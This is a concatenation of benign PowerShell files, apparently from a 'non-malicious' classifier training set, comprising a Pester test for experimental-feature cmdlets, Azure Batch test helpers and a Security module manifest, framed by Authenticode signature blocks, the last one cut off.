# ZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCOHPtgVdz9EW0iPNL/BXqJoqVMf6CBgzCB
# gKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
# EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
# BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUA
# AgUA6a3X/jAiGA8yMDI0MDMyNjIzMjU1MFoYDzIwMjQwMzI3MjMyNTUwWjB0MDoG
# CisGAQQBhFkKBAExLDAqMAoCBQDprdf+AgEAMAcCAQACAjRjMAcCAQACAhIuMAoC
# BQDpryl+AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEA
# AgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAIdo7Oifo0ZRZxgH
# mrAg40NIhm1ubs19X6VbYmWZaIayE+AYmsdeYRx9wx+B/TbWEPtJTQ6axScf7+p1
# V5yTBNtm5YMGveozyaGgrOf+bWvE4K6e8xIPf5IvMayhoR1MjvyHenGRUa3vtBgA
# s3dMzfbjKYjdbb+BswbNOF7Ar73rNHEBhudCvvaUZuVxY5mUkKq73qspAAxCIjq2
# oLr/VpCrs1s4e7WFglAR4KZ4ZN0jxx6hhh0oCnKb1N2kEkDRd2HSV/6pA67AxWPz
# lEKwLFml8bNPO73y/xFz+yZ8nnrYp6pMHmMYH+UhjESkpguEcz1x+HnckE3uMAim
# ndl9PfkxggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MAITMwAAAezgK6SC0JFSgAABAAAB7DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZI
# hvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAZAY/j/xShPAyy
# fG4lR6ocvr4dxOL7mCzM9NlmpxW38zCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQw
# gb0EICcJ5vVqfTfIhx21QBBbKyo/xciQIXaoMWULejAE1QqDMIGYMIGApH4wfDEL
# MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
# bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWlj
# cm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHs4CukgtCRUoAAAQAAAeww
# IgQgtUUFR6P9zR5R3grolAPyEYNSEVOqQO4jFZcY2YyCY3MwDQYJKoZIhvcNAQEL
# BQAEggIAlpE8Bh35lK2s/lNDyOFLfUrYAFJVV/WR+CF4YSqqoC2d2xqeEqOEIpcN
# 9LI4gHpad4tKiDC6TH3I37tQ/1gNIfuWJE1YxCZBX/IaDmIoKklIx7cHpZQdrf9u
# st3yebMgRrJrF62E18088XTLMHZK/sylYAwkhnNPibKHcDRkACI0+1artE5oMtiS
# s9i4qIn0iyYbl2YJe5ElyS3TSpy5E/3Mi+6+FQczBZak2CTK8u3UatDbi500WDXG
# hIVlNWYzZAMy/PMSwb6It6teo8KArBCcZtfgROBpXUPNcXZ0E+QGZy5Yv5enb1pR
# FmOCEbRHW0vnBl5OWyU0NWqo3MDNUF+2FmvwdhxkkJw3CL7XqoZtp+4fiwawJdv+
# nXhD15jm/+ZnfHfw/ZGemX4/l41u+nxFJlV7sM1ItelBMvQn+0sXz//PEObyFGNM
# cnlcMRaUpF3VOWXGypZaMC2Q4hSc5gqmnJtWVPBOFwh62JpEocjiOSk7hIvcKwfH
# 1HG34WWBhGfTIfYDm8KATsqrzC0e55AbNOQ7446SBSzfliKCBGF7M7bP98jo1vfV
# bhN8JVza/0MfKpIXuWoi8vIB7UpoxIienPh4kYYxTzd8rJfq2lwmvbzZsMaN8rEn
# biPBPKsMoY4blm9BdWeks1y2+2DnAuiBh3d5tKMc+Z/SaV3GroA=
# SIG # End signature block
|
combined_dataset/train/non-malicious/2059.ps1
|
2059.ps1
|
Import-Module HelpersCommon
Describe "Enable-ExperimentalFeature and Disable-ExperimentalFeature tests" -tags "Feature","RequireAdminOnWindows" {
BeforeAll {
$systemConfigPath = "$PSHOME/powershell.config.json"
if ($IsWindows) {
$userConfigPath = "~/Documents/powershell/powershell.config.json"
}
else {
$userConfigPath = "~/.config/powershell/powershell.config.json"
}
$systemConfigExists = $false
if (Test-Path $systemConfigPath) {
$systemConfigExists = $true
Move-Item $systemConfigPath "$systemConfigPath.backup" -Force -ErrorAction SilentlyContinue
}
$userConfigExists = $false
if (Test-Path $userConfigPath) {
$userConfigExists = $true
Move-Item $userConfigPath "$userConfigPath.backup" -Force -ErrorAction SilentlyContinue
}
$testModulePath = Join-Path -Path $PSScriptRoot -ChildPath "assets"
$originalModulePath = $env:PSModulePath
$env:PSModulePath = $testModulePath
}
AfterAll {
if ($systemConfigExists) {
Move-Item "$systemConfigPath.backup" $systemConfigPath -Force -ErrorAction SilentlyContinue
}
if ($userConfigExists) {
Move-Item "$userConfigPath.backup" $userConfigPath -Force -ErrorAction SilentlyContinue
}
$env:PSModulePath = $originalModulePath
}
AfterEach {
Remove-Item $systemConfigPath -Force -ErrorAction SilentlyContinue
Remove-Item $userConfigPath -Force -ErrorAction SilentlyContinue
}
It "Enable-ExperimentalFeature will enable Experimental Feature for scope: <scope>" -TestCases @(
@{ scope = "AllUsers" },
@{ scope = "CurrentUser" }
) {
param ($scope)
if (!(Test-CanWriteToPsHome) -and $scope -eq "AllUsers") {
return
}
$feature = pwsh -noprofile -output xml -command Get-ExperimentalFeature ExpTest.FeatureOne
$feature.Enabled | Should -BeFalse -Because "All Experimental Features disabled when no config file"
$feature = pwsh -noprofile -output xml -command Enable-ExperimentalFeature ExpTest.FeatureOne -Scope $scope -WarningAction SilentlyContinue
$feature | Should -BeNullOrEmpty -Because "No object is output to pipeline on success"
$feature = pwsh -noprofile -output xml -command Get-ExperimentalFeature ExpTest.FeatureOne
$feature.Enabled | Should -BeTrue -Because "The experimental feature is now enabled"
}
It "Disable-ExperimentalFeature will disable Experimental Feature for scope: <scope>" -TestCases @(
@{ scope = "AllUsers" ; configPath = $systemConfigPath },
@{ scope = "CurrentUser"; configPath = $userConfigPath }
) {
param ($scope, $configPath)
if (!(Test-CanWriteToPsHome) -and $scope -eq "AllUsers") {
return
}
'{"ExperimentalFeatures":["ExpTest.FeatureOne"]}' > $configPath
$feature = pwsh -noprofile -output xml -command Get-ExperimentalFeature ExpTest.FeatureOne
$feature.Enabled | Should -BeTrue -Because "Test config should enable ExpTest.FeatureOne"
$feature = pwsh -noprofile -output xml -command Disable-ExperimentalFeature ExpTest.FeatureOne -Scope $scope -WarningAction SilentlyContinue
$feature | Should -BeNullOrEmpty -Because "No object is output to pipeline on success"
$feature = pwsh -noprofile -output xml -command Get-ExperimentalFeature ExpTest.FeatureOne
$feature.Enabled | Should -BeFalse -Because "The experimental feature is now disabled"
}
It "<cmdlet> will output warning message" -TestCases @(
@{ cmdlet = "Enable-ExperimentalFeature" },
@{ cmdlet = "Disable-Experimentalfeature" }
) {
param ($cmdlet)
& $cmdlet ExpTest.FeatureOne -WarningVariable warning -WarningAction SilentlyContinue
$warning | Should -Not -BeNullOrEmpty -Because "A warning message is always given indicating restart is required"
}
It "Multiple features enabled will only output one warning message for <cmdlet>" -TestCases @(
@{ cmdlet = "Enable-ExperimentalFeature" },
@{ cmdlet = "Disable-Experimentalfeature" }
) {
param ($cmdlet)
Get-ExperimentalFeature | & $cmdlet -WarningAction SilentlyContinue -WarningVariable warning
$warning | Should -HaveCount 1
}
}
|
combined_dataset/train/non-malicious/3903.ps1
|
3903.ps1
|
function Start-TestSleep($milliseconds)
{
if ([Microsoft.Azure.Test.HttpRecorder.HttpMockServer]::Mode -ne [Microsoft.Azure.Test.HttpRecorder.HttpRecorderMode]::Playback)
{
Start-Sleep -Milliseconds $milliseconds
}
}
function Compute-TestTimeout($seconds)
{
if ([Microsoft.Azure.Test.HttpRecorder.HttpMockServer]::Mode -eq [Microsoft.Azure.Test.HttpRecorder.HttpRecorderMode]::Playback)
{
return 60 * 24 * 3
}
else
{
return $seconds
}
}
function Get-BatchAccountName
{
return getAssetName
}
function Get-ResourceGroupName
{
return getAssetName
}
function Get-BatchAccountProviderLocation($index)
{
if ([Microsoft.Azure.Test.HttpRecorder.HttpMockServer]::Mode -ne [Microsoft.Azure.Test.HttpRecorder.HttpRecorderMode]::Playback)
{
$namespace = "Microsoft.Batch"
$type = "batchAccounts"
$r = Get-AzResourceProvider -ProviderNamespace $namespace | where {$_.ResourceTypes[0].ResourceTypeName -eq $type}
$location = $r.Locations
if ($location -eq $null)
{
return "westus"
}
else
{
if ($index -eq $null)
{
return "westus"
}
else
{
return $location[$index]
}
}
}
return "westus"
}
|
combined_dataset/train/non-malicious/sample_51_81.ps1
|
sample_51_81.ps1
|
@{
GUID="A94C8C7E-9810-47C0-B8AF-65089C13A35A"
Author="PowerShell"
CompanyName="Microsoft Corporation"
Copyright="Copyright (c) Microsoft Corporation."
ModuleVersion="7.0.0.0"
CompatiblePSEditions = @("Core")
PowerShellVersion="3.0"
FunctionsToExport = @()
CmdletsToExport="Get-Acl", "Set-Acl", "Get-PfxCertificate", "Get-Credential", "Get-ExecutionPolicy", "Set-ExecutionPolicy", "Get-AuthenticodeSignature", "Set-AuthenticodeSignature", "ConvertFrom-SecureString", "ConvertTo-SecureString", "Get-CmsMessage", "Unprotect-CmsMessage", "Protect-CmsMessage" , "New-FileCatalog" , "Test-FileCatalog"
AliasesToExport = @()
NestedModules="Microsoft.PowerShell.Security.dll"
HelpInfoURI = 'https://aka.ms/powershell72-help'
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD++xTkW7oivoiQ
# gqU/R85f/MwSI1hVEeaegSriXP6+BqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFh1eRlM7vpfcyNRhGD2p01b
# 7R1UWqEpDNm2QYTPq7fWMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAXspH6BNY7nbQAAzC1kvWt9mAW2aV64hI290LtAjJOjj9tyjJNAREJUod
# Ti94rwhNCwq2Qpv0KJBSuHJ1XYbEkLboaiEPI/5smx7L4A+eGYgZ0dGNoCpVWYpe
# FgCRxD0fAmKZ8Ed3S54uX3J+EfpMXkrPhjkfKNvropz0oK7MeUXy74sWd1lUaIpQ
# 5smOjzDyQijq8o2dIo6S2GoxZiRcq8wgpT0UY7lhySgmkFFZiU5CUm7xEkHB0rWR
# TpDsR3r6kTAX9miBICR+sR/V6zs03MTba8DNLXGLxKq0pdHkclj8ohNFmYDsjewl
# /irOwKDbn8oN3G2ptSd59iFx7s5GoqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBghnvISx3TWuYdWp0s1Tt43KKzwQFCwn2wxdlvF7cmhwIGZiAgp4fR
# GBMyMDI0MDQyMzAyMjQxMC4xMzlaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC
# RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis
# DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI
# ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z
# ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR
# IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE
# lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s
# /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4
# aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB
# fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT
# me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy
# qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui
# hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds
# lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf
# sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t
# Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU
# +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7
# qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6
# Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+
# x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4
# 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5
# ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV
# PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4
# y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk
# 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
